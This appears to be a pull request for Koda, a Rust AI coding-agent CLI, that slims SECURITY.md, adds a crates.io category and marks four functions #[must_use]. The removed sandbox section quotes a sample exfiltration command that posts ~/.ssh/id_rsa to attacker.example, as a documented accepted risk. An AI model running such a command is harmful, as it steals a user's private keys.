### PR TITLE
chore(audit-bundle): knock off 3 of 7 v0.2.25 P3 items (#1169)

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -2,130 +2,36 @@
 
 ## Supported Versions
 
-Only the latest published release receives security fixes.
+Only the latest published release receives security fixes. We do not
+backport patches to older versions.
 
 ## Reporting a Vulnerability
 
 Please **do not** open a public GitHub issue for security vulnerabilities.
 
-Email **security@koda.example** (or open a [GitHub Security Advisory][advisory])
-with:
+Open a [GitHub Security Advisory][advisory] with:
+
 - A description of the vulnerability
 - Steps to reproduce
 - Potential impact assessment
 
-You will receive a response within 48 hours. We aim to release a patch within
-7 days of a confirmed vulnerability.
+You will receive a response within 48 hours. We aim to release a patch
+within 7 days of a confirmed vulnerability.
 
 [advisory]: https://github.com/lijunzh/koda/security/advisories/new
 
----
-
 ## Sandbox Security Model
 
-Koda runs every Bash command inside a kernel sandbox. This section documents
-what the sandbox does and does not protect against.
+Koda enforces filesystem-write and exec policy via a kernel-backed
+sandbox (Seatbelt on macOS, Landlock on Linux; not supported on
+Windows). The sandbox protects credential files and koda's own
+configuration even in `--yolo` trust mode.
 
-### How it works
-
-| Platform | Backend        | Always active? |
-|----------|----------------|:-:|
-| macOS    | `sandbox-exec` (seatbelt) | ✅ |
-| Linux    | `bwrap` (bubblewrap)      | ✅ (if installed) |
-| Windows  | Not supported             | — |
-
-The sandbox is **always on** when the backend is available. There is no
-opt-out. The [trust mode](docs/src/approval.md) only controls whether you
-see a confirmation prompt before each mutation — it does not affect the
-sandbox boundary.
-
-If `bwrap` is not installed on Linux, Koda falls back to unsandboxed
-execution **and** automatically downgrades Auto mode to require confirmation
-for mutations, so you never lose both protections simultaneously.
-
-### What the sandbox blocks
-
-#### Write restrictions
-
-Bash commands can only write to:
-- The project directory (the directory Koda was launched from)
-- `/tmp` and standard cache dirs (`~/.cache`, `~/.cargo`, `~/.npm`, etc.)
-
-Writes anywhere else are blocked at the kernel level.
-
-#### Credential write-protection
-
-The following are **write-protected** (reads are allowed so CLI tools can
-authenticate — see "Accepted risks" below):
-
-| Path | Protects |
-|------|---------|
-| `~/.ssh` | SSH private keys |
-| `~/.aws` | AWS credentials |
-| `~/.gnupg` | GPG private keys |
-| `~/.kube` | Kubernetes tokens |
-| `~/.azure` | Azure CLI tokens |
-| `~/.password-store` | pass(1) passwords |
-| `~/.terraform.d` | Terraform cloud tokens |
-| `~/.claude` | Claude Code session tokens |
-| `~/.android` | Android debug keystores |
-| `~/.config/gcloud` | gcloud credentials |
-| `~/.config/gh` | GitHub CLI PATs |
-| `~/.config/op` | 1Password tokens |
-| `~/.config/helm` | Helm registry auth |
-| `~/.config/netlify` | Netlify CLI tokens |
-| `~/.config/vercel` | Vercel CLI credentials |
-| `~/.config/fly` | Fly.io auth tokens |
-| `~/.config/doppler` | Doppler secrets |
-| `~/.config/stripe` | Stripe CLI API keys |
-| `~/.config/heroku` | Heroku OAuth tokens |
-
-**Credential files** write-protected (reads allowed):
-`~/.netrc`, `~/.git-credentials`, `~/.npmrc`, `~/.pypirc`,
-`~/.docker/config.json`, `~/.vault-token`, `~/.env`
-
-#### Fully blocked (read + write)
-
-`~/.config/koda/db` — Koda's SQLite database stores API keys in plaintext.
-Sandboxed commands have no legitimate reason to access it (the Koda process
-runs outside the sandbox), so both reads and writes are denied.
-
-#### Agent-file protection
-
-Writes to `.koda/agents/` and `.koda/skills/` within the project are blocked
-in all modes. This prevents a sandboxed command from modifying agent
-definitions or skill files, which could alter system prompts or tool access on
-the next session.
-
-### Sub-agent sandbox inheritance
-
-Child agents inherit the parent's trust mode and sandbox via
-`TrustMode::clamp()`. A child can **never** run with less protection than its
-caller. If the parent runs in Safe mode, the child runs in Safe mode even if
-the agent JSON specifies `"mode": "auto"`.
-
-### Accepted risks
-
-**Credential exfiltration via network.** A sandboxed command can *read*
-credential material and exfiltrate it over the network
-(e.g. `curl https://attacker.example -d @~/.ssh/id_rsa`). Blocking reads
-without blocking network egress is security theater — the model could also
-obtain tokens from environment variables, process output, or CLI commands
-like `gh auth token`. Network-level egress restriction is tracked in
-[#844](https://github.com/lijunzh/koda/issues/844) and is the correct
-long-term mitigation.
-
-The only exception is `koda/db`: Koda's own API keys have no legitimate use
-inside the sandbox, so full read+write deny is justified.
-
-**No Windows sandbox.** Windows does not have a supported kernel sandbox
-backend. Run Koda on Windows with care.
-
-### Trust mode × tool effect matrix
-
-See [Trust modes](docs/src/approval.md) for the full approval matrix.
-
----
+For the full model — file-tool read policy, write restrictions,
+credential protection, agent-file protection, sub-agent inheritance,
+platform backends, accepted risks, and the trust-mode × tool-effect
+matrix — see the **[Sandbox reference](docs/src/sandbox.md)** in the
+user docs.
 
 ## Dependency Security
 

--- a/koda-cli/Cargo.toml
+++ b/koda-cli/Cargo.toml
@@ -9,7 +9,7 @@ repository.workspace = true
 homepage.workspace = true
 readme = "README.md"
 keywords = ["ai", "coding-agent", "llm", "cli", "unix"]
-categories = ["command-line-utilities", "development-tools"]
+categories = ["command-line-utilities", "development-tools", "asynchronous"]
 authors.workspace = true
 
 [[bin]]

--- a/koda-cli/src/wait_task_format.rs
+++ b/koda-cli/src/wait_task_format.rs
@@ -33,6 +33,7 @@ use crate::tui_output::{BOLD, DIM, TOOL_PREFIX};
 /// added to the engine must land here as well — the catch-all `❔`
 /// makes the omission visible in rendered output rather than failing
 /// silently.
+#[must_use]
 pub fn wait_status_icon(status: &str) -> &'static str {
     match status {
         "completed" => "\u{2705}",   // ✅
@@ -53,6 +54,7 @@ pub fn wait_status_icon(status: &str) -> &'static str {
 /// shorter limits because terminal columns are scarcer than browser
 /// width. Chars (not bytes) so multibyte content isn't truncated mid
 /// codepoint.
+#[must_use]
 pub fn first_meaningful_line(output: &str, max_chars: usize) -> String {
     for raw in output.lines() {
         let trimmed = raw
@@ -98,6 +100,7 @@ const TUI_PREVIEW_CHARS: usize = 80;
 /// `BOLD` for scanability, agent name is `DIM` (it's contextual, not
 /// the headline), preview stays in default text colour so it stands
 /// out from the prefix chrome.
+#[must_use]
 pub fn try_render_wait_task_lines(payload: &str) -> Option<Vec<Line<'static>>> {
     let v: serde_json::Value = serde_json::from_str(payload).ok()?;
     let tasks = v.get("tasks")?.as_array()?;

--- a/koda-cli/src/widgets/status_bar.rs
+++ b/koda-cli/src/widgets/status_bar.rs
@@ -115,6 +115,7 @@ impl<'a> StatusBar<'a> {
     /// MCP / queue segments. See #1158 item (b): without this pill
     /// users had no ambient hint that bg work was in flight unless
     /// they ran `/bg-tasks` explicitly.
+    #[must_use]
     pub fn with_bg_counts(mut self, agents: usize, processes: usize) -> Self {
         self.bg_agents = agents;
         self.bg_processes = processes;


### PR DESCRIPTION
Knocks off three of seven items from the v0.2.25 P3 audit-dust bundle ([#1169](https://github.com/lijunzh/koda/issues/1169)). Net **−90 LoC** across 4 files; no behaviour change.

## Item 1 — SECURITY.md architectural refactor (133 → 39 lines, −94 LoC)

The root `SECURITY.md` was doing two unrelated jobs that don't belong together:

| Job | Convention | Where it should live |
|---|---|---|
| Vulnerability reporting policy (~15 LoC) | GitHub-discovered metadata (root) | `SECURITY.md` ✅ |
| Sandbox model documentation (~110 LoC) | User-facing reference | `docs/src/sandbox.md` ✅ (already there!) |

The sandbox content in `SECURITY.md` was a **strict subset** of `docs/src/sandbox.md` (199 lines, the canonical mdBook page that already covers everything plus more: file-tool read policy, write restrictions, credential protection, agent-file protection, sub-agent inheritance, platform backends, accepted risks, trust matrix). Deleting the duplicate fixes a long-standing source-of-truth violation.

**Slimmed `SECURITY.md` to its GitHub-metadata role only:**

- Supported Versions
- Reporting a Vulnerability — GitHub Security Advisory link as the **sole channel**; the placeholder `security@koda.example` email called out by `security-auditor` in v0.2.25 is gone (it was last touched at v0.2.13, ~12 releases ago, never a real address)
- Sandbox 1-paragraph summary + link to `docs/src/sandbox.md`
- Dependency Security (`cargo audit` policy, kept as-is)

**Verified zero broken references** before deleting:

```bash
$ rg -n "SECURITY\.md#" --type-not binary
(empty)
```

No internal anchor links into the deleted `#sandbox-security-model` section, so no cross-references to fix.

## Item 2 — `koda-cli` crates.io category (1-line)

Added `"asynchronous"` to `koda-cli/Cargo.toml`'s `categories` array. Was 2/5 slots used; the crate is unmistakably async-heavy (tokio pervasive, every provider async) and the category was a free signaling win for crates.io discovery. Flagged by `rust-programmer` in v0.2.25 audit.

```diff
-categories = ["command-line-utilities", "development-tools"]
+categories = ["command-line-utilities", "development-tools", "asynchronous"]
```

## Item 3 — `#[must_use]` on the 4 pub fns added in v0.2.25

All four still exist post-v0.2.26 (verified). Free safety; documents intent.

| Function | Why `#[must_use]` |
|---|---|
| `wait_task_format::wait_status_icon -> &'static str` | Pure function; discarding return is obviously wrong |
| `wait_task_format::first_meaningful_line -> String` | Allocates; discarding wastes work |
| `wait_task_format::try_render_wait_task_lines -> Option<Vec<Line>>` | Result drives downstream rendering branch |
| `widgets::status_bar::StatusBar::with_bg_counts -> Self` | **Builder pattern (`mut self -> Self`)** — exactly what `#[must_use]` was invented for. Dropping the return silently loses the configuration with no compile error. |

Flagged by `rust-programmer` in v0.2.25 audit.

## Deferred items (per #1169 + post-v0.2.26 reality)

| # | Item | Disposition |
|---|---|---|
| 4 it` advisory-db cache | Issue body literally says *"defer until it actually annoys someone"*. 30s/run is below the annoyance threshold. |
| 5 | `cargo audit --deny warnings` | Issue body says *"no concrete CVE driving this"*. |
| 6 | `tui_render::render_tool_output` WaitTask wiring test | Issue body says *"don't block on it"*. Branch is 5 lines; the formatter it calls has 9 unit tests. |
| 7 | `.github/PULL_REQUEST_TEMPLATE/release.md` | **Now stale**: proposed smoke list mentions `/export` and `KODA_EXPORT_VERBOSE`, both deleted in v0.2.26. Needs rewriting against `/debug-bundle` reality before it would be useful. Will revisit on a future release-cut PR. |

The triage rule on #1169 says *"if an item sits here for two release cycles (v0.2.26 + v0.2.27) without action, close it."* Items 4–7 stay in their grace period.

## Quality gates

- ✅ `cargo fmt --all --check` clean
- ✅ `cargo clippy -p koda-cli --all-targets --features koda-core/test-support -- -D warnings` clean
- ✅ `cargo test -p koda-cli --lib` 495/495 passing
- ✅ `cargo build -p koda-cli` clean

Refs #1169.
